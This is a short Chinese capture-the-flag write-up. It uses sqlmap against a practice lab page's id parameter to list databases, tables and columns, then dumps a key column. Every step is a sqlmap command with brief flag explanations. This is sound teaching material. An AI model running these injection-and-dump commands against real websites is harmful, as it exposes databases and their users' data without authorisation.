::: {.container}
::: {.post}
::: {.show-content}
工具：sqlmap

看到id=，看源码是get方式提交数据，所以可以用自动化工具试一试。

按照一般套路，先找数据库。

再找数据库里的表，表里面还有列，一路找下去，输出目标列的内容就可以了
命令是这样的：sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1\"
--dbs

-u 指定url；--dbs表明注入目标是查找有哪些数据库

::: {.image-package}
\

::: {.image-caption}
:::
:::

---

第一个数据库有四十多个表，第二个俩。第一个就省略了。

命令：sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1\" -D my_db
--tables

\

::: {.image-package}
\

::: {.image-caption}
:::
:::

---

其实也可以先查看当前使用的数据库，而不是每个数据库都看一看，这里只有两个，万一有十几个数据库怎么办。

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1\" --current-db

\

::: {.image-package}
\

::: {.image-caption}
:::
:::

---

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1\" -D my_db -T
thiskey --column

--columns：指定列出字段

::: {.image-package}
\

::: {.image-caption}
:::
:::

---

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1\" -D my_db -T
thiskey -C k0y --dump

-T：指定要列出字段的表；-C ：指定要暴的字段；--dump：将结果导出

::: {.image-package}
\

::: {.image-caption}
:::
:::
:::
:::
:::